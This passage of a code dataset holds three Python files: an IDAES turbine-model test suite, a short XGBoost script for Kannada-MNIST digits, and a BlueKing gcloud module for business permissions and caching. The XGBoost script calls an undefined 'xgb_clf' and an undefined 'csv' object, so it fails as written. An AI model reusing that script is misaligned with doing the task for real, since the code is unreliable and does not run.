"usage_type": "name"}, {"api_name": "pylearn2.utils.sharedX", "line_number": 58, "usage_type": "call"}, {"api_name": "pylearn2.utils.sharedX", "line_number": 61, "usage_type": "call"}, {"api_name": "theano.function", "line_number": 66, "usage_type": "call"}, {"api_name": "pylearn2.utils.serial.save", "line_number": 78, "usage_type": "call"}, {"api_name": "pylearn2.utils.serial", "line_number": 78, "usage_type": "name"}]} +{"seq_id": "338040453", "text": "#################################################################################\n# The Institute for the Design of Advanced Energy Systems Integrated Platform\n# Framework (IDAES IP) was produced under the DOE Institute for the\n# Design of Advanced Energy Systems (IDAES).\n#\n# Copyright (c) 2018-2023 by the software owners: The Regents of the\n# University of California, through Lawrence Berkeley National Laboratory,\n# National Technology & Engineering Solutions of Sandia, LLC, Carnegie Mellon\n# University, West Virginia University Research Corporation, et al.\n# All rights reserved. 
Please see the files COPYRIGHT.md and LICENSE.md\n# for full copyright and license information.\n#################################################################################\n\"\"\"\nTests for turbine outlet model.\n\nAuthor: John Eslick\n\"\"\"\nimport pytest\n\nfrom pyomo.environ import ConcreteModel, TransformationFactory, units as pyunits\n\nfrom idaes.core import FlowsheetBlock\nfrom idaes.models_extra.power_generation.unit_models.helm import HelmTurbineOutletStage\nfrom idaes.models.properties import iapws95\nfrom idaes.core.util.model_statistics import (\n degrees_of_freedom,\n activated_equalities_generator,\n)\nfrom idaes.core.solvers import get_solver\nfrom idaes.models.properties.general_helmholtz import helmholtz_available\n\n# Set up solver\nsolver = get_solver()\n\n\n@pytest.fixture()\ndef build_turbine():\n m = ConcreteModel()\n m.fs = FlowsheetBlock(dynamic=False)\n m.fs.properties = iapws95.Iapws95ParameterBlock()\n m.fs.turb = HelmTurbineOutletStage(property_package=m.fs.properties)\n return m\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.fixture()\ndef build_turbine_dyn():\n m = ConcreteModel()\n m.fs = FlowsheetBlock(dynamic=True, time_units=pyunits.s)\n m.fs.properties = iapws95.Iapws95ParameterBlock()\n m.fs.turb = HelmTurbineOutletStage(dynamic=False, property_package=m.fs.properties)\n return m\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.mark.unit\ndef test_basic_build(build_turbine):\n \"\"\"Make a turbine model and make sure it doesn't throw exception\"\"\"\n m = build_turbine\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.mark.component\ndef test_initialize(build_turbine):\n \"\"\"Initialize a turbine model\"\"\"\n m = build_turbine\n # set inlet\n m.fs.turb.inlet.enth_mol[0].value = 47115\n m.fs.turb.inlet.flow_mol[0].value = 15000\n m.fs.turb.inlet.pressure[0].value = 8e4\n m.fs.turb.outlet.pressure[0].fix(4e4)\n\n m.fs.turb.initialize(outlvl=1)\n\n eq_cons = activated_equalities_generator(m)\n for c in eq_cons:\n assert abs(c.body() - c.lower) < 1e-4\n assert degrees_of_freedom(m) == 2 # inlet was't fixed and still shouldn't be\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.mark.component\ndef test_initialize_calc_cf(build_turbine):\n \"\"\"Initialize a turbine model\"\"\"\n m = build_turbine\n # set inlet\n m.fs.turb.inlet.enth_mol[0].value = 47115\n m.fs.turb.inlet.flow_mol[0].value = 15000\n m.fs.turb.inlet.pressure[0].value = 8e4\n m.fs.turb.outlet.pressure[0].fix(4e4)\n\n m.fs.turb.initialize(calculate_cf=True)\n\n eq_cons = activated_equalities_generator(m)\n for c in eq_cons:\n assert abs(c.body() - c.lower) < 1e-4\n\n m.fs.turb.inlet.enth_mol[0].fix()\n m.fs.turb.inlet.pressure[0].fix()\n\n solver.solve(m)\n assert m.fs.turb.inlet.flow_mol[0].value == pytest.approx(15000)\n assert degrees_of_freedom(m) == 0\n\n\n@pytest.mark.skipif(not helmholtz_available(), reason=\"General Helmholtz not available\")\n@pytest.mark.component\ndef test_initialize_calc_cf_dyn(build_turbine_dyn):\n \"\"\"Initialize a turbine model\"\"\"\n m = build_turbine_dyn\n discretizer = TransformationFactory(\"dae.finite_difference\")\n discretizer.apply_to(m, nfe=4, wrt=m.fs.time, scheme=\"BACKWARD\")\n # set inlet\n m.fs.turb.inlet.enth_mol.fix(47115)\n for t in m.fs.turb.inlet.flow_mol:\n m.fs.turb.inlet.flow_mol[t].value = 15000\n 
m.fs.turb.inlet.pressure.fix(8e4)\n m.fs.turb.outlet.pressure.fix(4e4)\n m.fs.turb.flow_coeff.fix()\n\n assert degrees_of_freedom(m) == 0\n m.fs.turb.initialize(calculate_cf=True)\n eq_cons = activated_equalities_generator(m)\n for c in eq_cons:\n assert abs(c.body() - c.lower) < 1e-4\n solver.solve(m)\n assert m.fs.turb.inlet.flow_mol[0].value == pytest.approx(15000)\n assert degrees_of_freedom(m) == 0\n\n\n@pytest.mark.skipif(not iapws95.iapws95_available(), reason=\"IAPWS not available\")\n@pytest.mark.unit\ndef test_get_stream_table_contents(build_turbine):\n stable = build_turbine.fs.turb._get_stream_table_contents()\n\n expected = {\n \"Units\": {\n \"Mass Flow\": getattr(pyunits.pint_registry, \"kg/s\"),\n \"Molar Flow\": getattr(pyunits.pint_registry, \"mol/s\"),\n \"Molar Enthalpy\": getattr(pyunits.pint_registry, \"J/mol\"),\n \"P\": getattr(pyunits.pint_registry, \"Pa\"),\n \"T\": getattr(pyunits.pint_registry, \"K\"),\n \"Vapor Fraction\": getattr(pyunits.pint_registry, \"dimensionless\"),\n },\n \"Inlet\": {\n \"Mass Flow\": pytest.approx(0.01801527, rel=1e-5),\n \"Molar Flow\": pytest.approx(1.0, rel=1e-5),\n \"Molar Enthalpy\": pytest.approx(0.01102139, rel=1e-5),\n \"P\": pytest.approx(11032300, rel=1e-5),\n \"T\": pytest.approx(270.4877, rel=1e-5),\n \"Vapor Fraction\": pytest.approx(0.0, abs=1e-5),\n },\n \"Outlet\": {\n \"Mass Flow\": pytest.approx(0.01801527, rel=1e-5),\n \"Molar Flow\": pytest.approx(1.0, rel=1e-5),\n \"Molar Enthalpy\": pytest.approx(0.01102139, rel=1e-5),\n \"P\": pytest.approx(11032300, rel=1e-5),\n \"T\": pytest.approx(270.4877, rel=1e-5),\n \"Vapor Fraction\": pytest.approx(0.0, abs=1e-5),\n },\n }\n\n assert stable.to_dict() == expected\n", "sub_path": "idaes/models_extra/power_generation/unit_models/helm/tests/test_turbine_outlet.py", "file_name": "test_turbine_outlet.py", "file_ext": "py", "file_size_in_byte": 6040, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "idaes.core.solvers.get_solver", "line_number": 33, "usage_type": "call"}, {"api_name": "pyomo.environ.ConcreteModel", "line_number": 38, "usage_type": "call"}, {"api_name": "idaes.core.FlowsheetBlock", "line_number": 39, "usage_type": "call"}, {"api_name": "idaes.models.properties.iapws95.Iapws95ParameterBlock", "line_number": 40, "usage_type": "call"}, {"api_name": "idaes.models.properties.iapws95", "line_number": 40, "usage_type": "name"}, {"api_name": "idaes.models_extra.power_generation.unit_models.helm.HelmTurbineOutletStage", "line_number": 41, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 36, "usage_type": "call"}, {"api_name": "pyomo.environ.ConcreteModel", "line_number": 48, "usage_type": "call"}, {"api_name": "idaes.core.FlowsheetBlock", "line_number": 49, "usage_type": "call"}, {"api_name": "pyomo.environ.units.s", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 49, "usage_type": "name"}, {"api_name": "idaes.models.properties.iapws95.Iapws95ParameterBlock", "line_number": 50, "usage_type": "call"}, {"api_name": "idaes.models.properties.iapws95", "line_number": 50, "usage_type": "name"}, {"api_name": "idaes.models_extra.power_generation.unit_models.helm.HelmTurbineOutletStage", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 45, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 45, "usage_type": "attribute"}, {"api_name": 
"idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 45, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 55, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 55, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 55, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 56, "usage_type": "attribute"}, {"api_name": "idaes.core.util.model_statistics.activated_equalities_generator", "line_number": 75, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.degrees_of_freedom", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 62, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 62, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 62, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 63, "usage_type": "attribute"}, {"api_name": "idaes.core.util.model_statistics.activated_equalities_generator", "line_number": 94, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 102, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.degrees_of_freedom", "line_number": 103, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 81, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 81, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 81, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pyomo.environ.TransformationFactory", "line_number": 111, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.degrees_of_freedom", "line_number": 121, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.activated_equalities_generator", "line_number": 123, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 127, "usage_type": "call"}, {"api_name": "idaes.core.util.model_statistics.degrees_of_freedom", "line_number": 128, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 106, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 106, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.general_helmholtz.helmholtz_available", "line_number": 106, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 138, "usage_type": "name"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 139, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 139, "usage_type": "name"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 140, "usage_type": "name"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 141, "usage_type": "name"}, {"api_name": "pyomo.environ.units.pint_registry", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 142, "usage_type": "name"}, {"api_name": 
"pyomo.environ.units.pint_registry", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pyomo.environ.units", "line_number": 143, "usage_type": "name"}, {"api_name": "pytest.approx", "line_number": 146, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 147, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 148, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 149, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 150, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 151, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 154, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 155, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 156, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 157, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 158, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 159, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 131, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 131, "usage_type": "attribute"}, {"api_name": "idaes.models.properties.iapws95.iapws95_available", "line_number": 131, "usage_type": "call"}, {"api_name": "idaes.models.properties.iapws95", "line_number": 131, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 132, "usage_type": "attribute"}]} +{"seq_id": "542863854", "text": "# file processing\nimport os, sys\n\n# data processing\nimport numpy as np\nimport pandas as pd\n\n# xgboost runtime\nimport xgboost as xgb\n\n# preprocess\nfrom sklearn.model_selection import train_test_split\n\n# ignore warning\nimport warnings\nwarnings.filterwarnings('ignore')\n\nif __name__ == \"__main__\":\n train = pd.read_csv(\"../../data/raw/Kannada-MNIST/train.csv\")\n test = pd.read_csv(\"../../data/raw/Kannada-MNIST/test.csv\")\n\n # Split train and test data\n column = ['pixel{}'.format(i) for i in range(784)]\n x_train, x_valid, y_train, y_valid = train_test_split(train[column], train['label'], test_size=0.1)\n\n # Setting dataset to xgboost runtime type.\n dtrain = xgb.DMatrix(x_train, label=y_train)\n dvalid = xgb.DMatrix(x_valid, label=y_valid)\n\n # Setting parameters.\n # Decide Task method, Metrics, etc.\n xgb_params = {\n \"objective\" : \"multi:softmax\",\n \"eval_metric\" : \"mlogloss\",\n \"num_class\" : 10,\n \"max_depth\" : 12,\n \"eta\" : 0.05,\n \"subsample\" : 0.9,\n \"colsample_bytree\" : 0.9,\n }\n \n # train\n watchlist = [(dvalid, 'eval'), (dtrain, 'train')]\n clf = xgb.train(\n params=xgb_params,\n dtrain=dtrain,\n num_boost_round=4000,\n evals=watchlist,\n early_stopping_rounds=20,\n verbose_eval=20\n )\n res = xgb_clf.predict( xgb.DMatrix(test[column]) ).astype(int)\n\n with open(\"../../data/processed/xgboost_simple.csv\", \"w\") as f:\n csv.write(res)\n", "sub_path": "src/processing/xgboost.py", "file_name": "xgboost.py", "file_ext": "py", "file_size_in_byte": 1485, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 24, "usage_type": "call"}, {"api_name": "xgboost.DMatrix", "line_number": 27, "usage_type": "call"}, 
{"api_name": "xgboost.DMatrix", "line_number": 28, "usage_type": "call"}, {"api_name": "xgboost.train", "line_number": 44, "usage_type": "call"}, {"api_name": "xgboost.DMatrix", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "369606132", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community\nEdition) available.\nCopyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\nhttp://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\n\nimport calendar\nimport datetime\nimport json\nimport re\nimport logging\nimport time\nimport pytz\n\nfrom django.core.cache import cache\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom django.utils import six\nfrom guardian.shortcuts import assign_perm\n\nfrom gcloud.conf import settings\nfrom gcloud import exceptions\nfrom gcloud.core import roles\nfrom gcloud.core.constant import AE\nfrom gcloud.core.models import Business, BusinessGroupMembership\nfrom gcloud.core.api_adapter import (\n is_user_functor,\n get_operate_user_list,\n is_user_auditor,\n get_auditor_user_list,\n get_user_info,\n adapt_get_user_data\n)\n\nlogger = logging.getLogger(\"root\")\nget_client_by_user = settings.ESB_GET_CLIENT_BY_USER\nCACHE_PREFIX = __name__.replace('.', '_')\nDEFAULT_CACHE_TIME_FOR_CC = settings.DEFAULT_CACHE_TIME_FOR_CC\n\n\n# LifeCycle:'1':测试中, '2':已上线, '3': 停运, 其他如'0'、''是非法值\ndef _get_user_business_list(request, use_cache=True):\n \"\"\"Get authorized business list for a exact username.\n\n :param object request: django request object.\n :param bool use_cache: (Optional)\n \"\"\"\n user = request.user\n cache_key = \"%s_get_user_business_list_%s\" % (CACHE_PREFIX, user.username)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n user_info = _get_user_info(request)\n client = get_client_by_user(request.user.username)\n result = client.cc.search_business({\n 'bk_supplier_account': user_info['bk_supplier_account'],\n 'condition': {\n 'bk_data_status': {'$in': ['enable', 'disabled', None]},\n '$or': [{'bk_biz_developer': {\"$regex\": user.username}},\n {'bk_biz_productor': {\"$regex\": user.username}},\n {'bk_biz_maintainer': {\"$regex\": user.username}},\n {'bk_biz_tester': {\"$regex\": user.username}}]\n }\n })\n\n if result['result']:\n data = result['data']['info']\n cache.set(cache_key, data, DEFAULT_CACHE_TIME_FOR_CC)\n elif result.get('code') in ('20101', 20101):\n raise exceptions.Unauthorized(result['message'])\n elif result.get('code') in ('20103', 20103, '20201', 20201,\n '20202', 20202):\n raise exceptions.Forbidden(result['message'])\n else:\n raise exceptions.APIError(\n 'cc',\n 'search_business',\n result.get('detail_message', result['message'])\n )\n\n return data\n\n\ndef _get_user_info(request, use_cache=True):\n \"\"\"\n 获取用户基本信息\n @param request:\n @param use_cache:\n @return:\n \"\"\"\n user = request.user\n cache_key = \"%s_get_user_info_%s\" % 
(CACHE_PREFIX, user.username)\n data = cache.get(cache_key)\n if not (use_cache and data):\n userinfo = get_user_info(request)\n userinfo.setdefault('code', -1)\n if userinfo['result']:\n data = userinfo['data']\n if data:\n cache.set(cache_key, data, DEFAULT_CACHE_TIME_FOR_CC)\n elif userinfo.get('code') in ('20101', 20101):\n raise exceptions.Unauthorized(userinfo['message'])\n elif userinfo.get('code') in ('20103', 20103, '20201', 20201,\n '20202', 20202):\n raise exceptions.Forbidden(userinfo['message'])\n else:\n raise exceptions.APIError(\n 'bk_api',\n 'get_user_info',\n userinfo.get('detail_message', userinfo['message'])\n )\n return data\n\n\ndef _get_business_info(request, app_id, use_cache=True, use_maintainer=False):\n \"\"\"Get detail infomations for a exact app_id.\n\n @param object request: django request object.\n @param int app_id: cc_id of core.business model.\n @param use_maintainer: 使用运维身份请求\n \"\"\"\n username = request.user.username\n business = Business.objects.get(cc_id=app_id)\n cache_key = \"%s_get_business_info_%s_%s\" % (CACHE_PREFIX, app_id, username)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n if use_maintainer:\n client = get_client_by_user_and_biz_id(username, app_id)\n else:\n client = get_client_by_user(request.user.username)\n result = client.cc.search_business({\n 'bk_supplier_account': business.cc_owner,\n 'condition': {\n 'bk_biz_id': int(app_id)\n }\n })\n\n if result['result']:\n if not result['data']['info']:\n raise exceptions.Forbidden()\n data = result['data']['info'][0]\n elif result.get('code') in ('20101', 20101):\n raise exceptions.Unauthorized(result['message'])\n elif result.get('code') in ('20103', 20103, '20201', 20201,\n '20202', 20202):\n raise exceptions.Forbidden(result['message'])\n else:\n raise exceptions.APIError(\n 'cc',\n 'get_app_by_id',\n result.get('detail_message', result['message'])\n )\n\n cache.set(cache_key, data, DEFAULT_CACHE_TIME_FOR_CC)\n\n return data\n\n\ndef add_maintainer_to_biz(user, business_list):\n user_group_name = [g.name for g in user.groups.all()]\n\n for business in business_list:\n group_name = convert_group_name(business.cc_id, roles.MAINTAINERS)\n if group_name in user_group_name:\n continue\n\n group, _ = Group.objects.get_or_create(name=group_name)\n\n # assign view business perm for all roles\n assign_perm('view_business', group, business)\n assign_perm('manage_business', group, business)\n\n BusinessGroupMembership.objects.get_or_create(\n business=business,\n group=group\n )\n user.groups.add(group)\n\n\ndef update_relationships(request, obj, extras, created=False, use_cache=True):\n \"\"\"\n Update business-group(role) relationships & group-user memberships\n \"\"\"\n cache_key = \"%s_update_relationships_%s\" % (CACHE_PREFIX, obj.cc_id)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n groups = {}\n # first, create related groups if not exist\n for role in roles.ALL_ROLES:\n group_name = convert_group_name(obj.cc_id, role)\n group, group_created = Group.objects.get_or_create(name=group_name) # TODO\n groups[group_name] = (group, group_created)\n\n if group_created:\n # assign view business perm for all roles\n assign_perm('view_business', group, obj)\n\n # assign manage business perm only for admin roles\n if role in roles.ADMIN_ROLES:\n assign_perm('manage_business', group, obj)\n\n with transaction.atomic():\n try:\n Business.objects.select_for_update().get(pk=obj.pk)\n except Business.DoesNotExist:\n return None\n\n data = cache.get(cache_key)\n\n if not 
(use_cache and data):\n # If not created, clear business to group memberships\n if not created:\n obj.groups.clear()\n\n for group_name in groups:\n group, created = groups[group_name]\n # If not created, clear group to user memberships\n if not created:\n group.user_set.clear()\n\n BusinessGroupMembership.objects.get_or_create(\n business=obj,\n group=group\n )\n\n role = group_name.split('\\x00')[1]\n resp_data_role = '{}'.format(roles.CC_V2_ROLE_MAP.get(role, role))\n role_users = extras.get(resp_data_role) or ''\n user_model = get_user_model()\n user_list = role_users.split(',')\n\n # 职能化人员单独授权\n if role == roles.FUNCTOR:\n user_list = get_operate_user_list(request)\n\n # 审计人员单独授权\n if role == roles.AUDITOR:\n user_list = get_auditor_user_list(request)\n\n for username in user_list:\n if username:\n user, _ = user_model.objects.get_or_create(\n username=username)\n user.groups.add(group)\n\n cache.set(cache_key, True, DEFAULT_CACHE_TIME_FOR_CC)\n\n\ndef prepare_view_all_business(request):\n \"\"\"\n @summary:职能化和审计人员授权所有业务的查看权限\n \"\"\"\n bizs = Business.objects.all()\n User = get_user_model()\n user = User.objects.get(username=request.user.username)\n\n for obj in bizs:\n group_name = convert_group_name(obj.cc_id, roles.AUDITOR)\n group, created = Group.objects.get_or_create(name=group_name)\n\n if created:\n # assign view business perm for all roles\n assign_perm('view_business', group, obj)\n\n BusinessGroupMembership.objects.get_or_create(\n business=obj,\n group=group\n )\n\n user.groups.add(group)\n\n\ndef get_business_obj(request, cc_id, use_cache=True, use_maintainer=False):\n cache_key = \"%s_get_business_obj_%s\" % (CACHE_PREFIX, cc_id)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n info = _get_business_info(request, cc_id, use_cache, use_maintainer)\n defaults = {\n 'cc_name': info['bk_biz_name'],\n 'cc_owner': info['bk_supplier_account'],\n 'cc_company': info.get('bk_supplier_id') or 0,\n 'time_zone': info['time_zone'],\n 'life_cycle': info.get('life_cycle', '')\n }\n obj, created = Business.objects.update_or_create(\n cc_id=info['bk_biz_id'],\n defaults=defaults\n )\n\n data = (obj, created, info)\n\n cache.set(cache_key, (obj, False, info), DEFAULT_CACHE_TIME_FOR_CC)\n\n return data\n\n\ndef _update_user_info(info):\n info = adapt_get_user_data(info)\n User = get_user_model()\n User.objects.update_or_create(\n username=info['uin'],\n defaults=info\n )\n\n\ndef update_user_info(request, cc_id, use_cache=True):\n cache_key = \"%s_update_user_info_%s\" % (CACHE_PREFIX, cc_id)\n data = cache.get(cache_key)\n\n if not (use_cache and data):\n result = get_user_info(request)\n if result['result']:\n _update_user_info(result['data'])\n elif result['code'] in ('20101', 20101):\n raise exceptions.Unauthorized(result['message'])\n elif result['code'] in ('20103', 20103):\n raise exceptions.Forbidden(result['message'])\n else:\n raise exceptions.APIError(\n settings.ESB_AUTH_COMPONENT_SYSTEM,\n 'get_user',\n result.get('detail_message', result['message'])\n )\n\n cache.set(cache_key, True, DEFAULT_CACHE_TIME_FOR_CC)\n\n\ndef prepare_business(request, cc_id, use_cache=True):\n # first, get the business object\n user = request.user\n if user.is_superuser or is_user_functor(request) or is_user_auditor(request):\n try:\n obj, created, extras = get_business_obj(request, cc_id, use_cache)\n except Exception:\n objs = Business.objects.filter(cc_id=cc_id)\n if not objs.exists():\n raise exceptions.Forbidden()\n obj = objs[0]\n extras = {}\n else:\n obj, created, extras = 
get_business_obj(request, cc_id, use_cache)\n\n # access archived business is not allowed\n if not obj.available():\n raise exceptions.Forbidden()\n\n # then, update business object relationships\n if extras:\n update_relationships(request, obj, extras)\n\n # update user info (uin and nick name)\n update_user_info(request, cc_id)\n\n return obj\n\n\ndef is_user_relate_business(user, biz):\n biz_roles = set()\n for role in roles.CC_V2_ROLE_MAP.values():\n members = str(biz[role]).split(',')\n biz_roles.update(members)\n\n return user.username in biz_roles\n\n\ndef prepare_user_business(request, use_cache=True):\n user = request.user\n cache_key = \"%s_prepare_user_business_%s\" % (CACHE_PREFIX, user.username)\n data = cache.get(cache_key)\n maintainer_key = roles.CC_V2_ROLE_MAP[roles.MAINTAINERS]\n\n if not (use_cache and data):\n data = []\n biz_list = _get_user_business_list(request, use_cache)\n maintainer_business = []\n\n for biz in biz_list:\n if biz['bk_biz_name'] == u\"资源池\":\n continue\n defaults = {\n 'cc_name': biz['bk_biz_name'],\n 'cc_owner': biz['bk_supplier_account'],\n 'cc_company': biz.get('bk_supplier_id') or 0,\n 'time_zone': biz.get('time_zone', ''),\n 'life_cycle': biz.get('life_cycle', ''),\n 'status': biz.get('bk_data_status', 'enable')\n }\n\n if defaults['status'] == 'disabled':\n # do not create model for archived business\n try:\n Business.objects.get(cc_id=biz['bk_biz_id'])\n except Business.DoesNotExist:\n continue\n\n # update business status\n obj, _ = Business.objects.update_or_create(\n cc_id=biz['bk_biz_id'],\n defaults=defaults\n )\n\n # only append business which relate to user and not been archived\n if obj not in data and is_user_relate_business(user, biz) and obj.available():\n data.append(obj)\n\n if user.username in set(str(biz[maintainer_key]).split(',')):\n maintainer_business.append(obj)\n\n # 为该用户有运维权限的业务添加运维角色,防止第一次进入时拉取不到业务列表\n add_maintainer_to_biz(user, maintainer_business)\n\n cache.set(cache_key, data, DEFAULT_CACHE_TIME_FOR_CC)\n\n return data\n\n\ndef get_biz_maintainer_info(biz_cc_id, username='', use_in_context=False):\n \"\"\"\n 获取当前业务下登录过的运维人员信息,包括 operator和auth_token\n @param biz_cc_id:\n @param username: 当前操作者\n @return: operator 业务运维\n @return: auth_token 业务运维的认证信息\n \"\"\"\n business = Business.objects.get(cc_id=biz_cc_id)\n role = roles.MAINTAINERS\n group_name = convert_group_name(biz_cc_id, role)\n try:\n group = Group.objects.get(name=group_name)\n except Group.DoesNotExist:\n logger.error('get_biz_maintainer_info raise error, group[%s] does not exist' % group_name)\n return '', ''\n maintainers = group.user_set.order_by('last_login')\n\n # 如果是用在流程的 context 中且业务打开了一直使用任务执行这开关\n if use_in_context and business.always_use_executor and business.executor:\n user = maintainers.filter(username=business.executor)\n if user.exists():\n return user[0].username, user[0].auth_token\n\n # 如果操作者就是运维,则首先尝试返回自己的信息\n if username:\n user = maintainers.filter(username=username)\n if user.exists():\n return username, user[0].auth_token\n\n # 如果业务执行者未从业务运维列表中删除,则使用业务执行者\n if business.executor:\n user = maintainers.filter(username=business.executor)\n if user.exists():\n return user[0].username, user[0].auth_token\n\n # 随机取包含 ESB 鉴权信息的运维\n authorized_maintainer = ''\n auth_token = ''\n if maintainers:\n authorized_maintainer = maintainers[0].username\n auth_token = maintainers[0].auth_token\n\n return authorized_maintainer, auth_token\n\n\ndef get_client_by_user_and_biz_id(username, biz_cc_id):\n \"\"\"\n @summary: 根据用户和业务获取运维身份的client\n :param 
def get_client_by_user_and_biz_id(username, biz_cc_id):\n \"\"\"\n @summary: get a client with maintainer identity for the given user and business\n :param username:\n :param biz_cc_id:\n :return:\n \"\"\"\n # first, call the API as a maintainer that has an auth_token\n maintainer, __ = get_biz_maintainer_info(biz_cc_id, username)\n if maintainer:\n return get_client_by_user(maintainer)\n\n # no maintainer auth_token exists for this business; execute as the user themselves\n return get_client_by_user(username)\n\n\ndef time_now_str():\n return timezone.localtime(timezone.now()).strftime('%Y%m%d%H%M%S')\n\n\ndef strftime_with_timezone(utc_time):\n if utc_time:\n return timezone.localtime(utc_time).strftime('%Y-%m-%d %H:%M:%S %z')\n else:\n return ''\n\n\ndef convert_readable_username(username):\n \"\"\"Convert a username into a nickname\"\"\"\n return username\n\n\ndef name_handler(name, max_length):\n \"\"\"Sanitize a name\"\"\"\n # strip special characters\n name_str = re.compile(r'[<>.,;~!@#^&*¥\\'\\\"]+').sub('', name)\n # truncate to the maximum length\n return name_str[:max_length]\n\n\ndef timestamp_to_datetime(timestamp):\n \"\"\"\n Convert a timestamp into a datetime.\n :param timestamp:\n :return:\n \"\"\"\n try:\n # the frontend sends milliseconds, which must be converted to seconds\n timestamp = timestamp / 1000\n # timestamp to datetime\n return timezone.datetime.fromtimestamp(timestamp, tz=pytz.utc)\n except ValueError:\n logger.error(\"illegal parameter format :%s\" % timestamp)\n return None\n\n\ndef format_datetime(dt):\n \"\"\"\n Format a datetime as a string (with timezone).\n :param dt: type:datetime.datetime\n :return:\n \"\"\"\n # translate to time in local timezone\n if not dt:\n return ''\n if timezone.is_aware(dt):\n dt = timezone.localtime(dt)\n return dt.strftime(\"%Y-%m-%d %H:%M:%S %z\")\n\n\ndef check_and_rename_params(conditions, group_by, group_by_check=AE.group_list):\n \"\"\"\n Validate the parameters.\n :param conditions: a dict of filter conditions\n :param group_by: the group-by key\n :param group_by_check: the allowed group-by keys\n :return:\n \"\"\"\n # check whether conditions is a dict.\n # comment out this try block when testing locally\n result_dict = {'success': False, 'content': None, \"conditions\": conditions, \"group_by\": None}\n try:\n conditions = json.loads(conditions)\n except Exception:\n message = u\"param conditions[%s] cannot be converted to dict\" % conditions\n logger.error(message)\n result_dict['content'] = message\n return result_dict\n if 